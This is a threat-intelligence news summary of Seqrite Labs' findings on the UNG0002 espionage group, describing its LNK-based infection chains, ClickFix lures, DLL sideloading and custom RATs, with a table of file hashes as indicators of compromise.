UNG0002 Deploys Weaponized LNK Files with Cobalt Strike and Metasploit to Target Organizations
Seqrite Labs APT-Team has uncovered a persistent threat entity, UNG0002 (Unknown Group 0002), orchestrating espionage-driven operations across Asian jurisdictions, including China, Hong Kong, and Pakistan.
Active since at least May 2024, this South-East Asia-based cluster has demonstrated a high degree of adaptability and technical prowess, targeting critical sectors such as defense, civil aviation, electrotechnical engineering, gaming, software development, and academia.
Sophisticated Espionage Campaigns
UNG0002’s operations, tracked under two major campaigns Operation Cobalt Whisper (May 2024 – September 2024) and Operation AmberMist (January 2025 – May 2025) reveal a strategic focus on intelligence gathering through sophisticated multi-stage attacks.
Their consistent use of weaponized shortcut files (LNK), VBScript, and post-exploitation tools like Cobalt Strike and Metasploit underscores their preference for evasive and impactful intrusion techniques.
During Operation Cobalt Whisper, UNG0002 executed 20 distinct infection chains, primarily targeting defense and aviation sectors with CV-themed decoy documents designed to lure victims into executing malicious payloads.
The more recent Operation AmberMist shows an evolution in their approach, incorporating lightweight custom implants such as Shadow RAT, INET RAT, and Blister DLL, alongside innovative social engineering tactics like the ClickFix Technique.
This method tricks users into running malicious PowerShell scripts via fake CAPTCHA verification pages, with instances of spoofing legitimate entities like Pakistan’s Ministry of Maritime Affairs website.
Evolving Tactics with Custom Implants
Furthermore, the group exploits DLL sideloading by abusing trusted Windows applications such as Rasphone and Node-Webkit binaries to execute malicious code while evading detection.
Their use of realistic decoy documents, often mimicking resumes of game UI designers or computer science students from reputed institutions, highlights their tailored approach to specific industries.
The group’s infrastructure also reveals consistent naming conventions and operational security, with PDB paths like “C:UsersThe FreelancersourcereposJAN25mustangx64Releasemustang.pdb” for Shadow RAT hinting at potential codenames and mimicry of other threat actors’ playbooks to obscure attribution.
Seqrite Labs assesses with high confidence that UNG0002’s focus on espionage, combined with their adaptability in adopting techniques from other threat groups, complicates efforts to pinpoint their origins beyond a South-East Asian base.
Their shift from relying on Cobalt Strike and Metasploit to developing custom RATs indicates a well-resourced operation with a persistent intent to refine their toolset.
As the threat landscape evolves, Seqrite continues to monitor this cluster, acknowledging contributions from the broader research community, including malwarehunterteam, in tracking these campaigns.
Detailed technical analyses of infection chains and campaign specifics are available in Seqrite’s comprehensive whitepaper.
Indicators of Compromise (IOCs)
| File Type | Hash (SHA-256) | Notes |
|---|---|---|
| LNK (Shortcut) | 4ca4f673e4389a352854f5feb0793dac43519ade8049b5dd9356d0cbe0f06148 | Used in initial infection chains |
| VBS (VBScript) | ad97b1c79735b1b97c4c4432cacac2fce6316889eafb41a0d97f2b0e565ee850 | Deployed for payload execution |
| Batch Script (.bat) | a31d742d7e36fefed01971d8cba827c71e69d59167e080d2f551210c85fddaa5 | Facilitates multi-stage attacks |
| Blister DLL Implant | c3ccfe415c3d3b89bde029669f42b7f04df72ad2da4bd15d82495b58ebde46d6 | Sideloaded via Node-Webkit in AmberMist |
| Shadow RAT | 90c9e0ee1d74b596a0acf1e04b41c2c5f15d16b2acd39d3dc8f90b071888ac99 | Deployed via Rasphone with decoy loader |
Get Free Ultimate SOC Requirements Checklist Before you build, buy, or switch your SOC for 2025 - Download Now
Source link
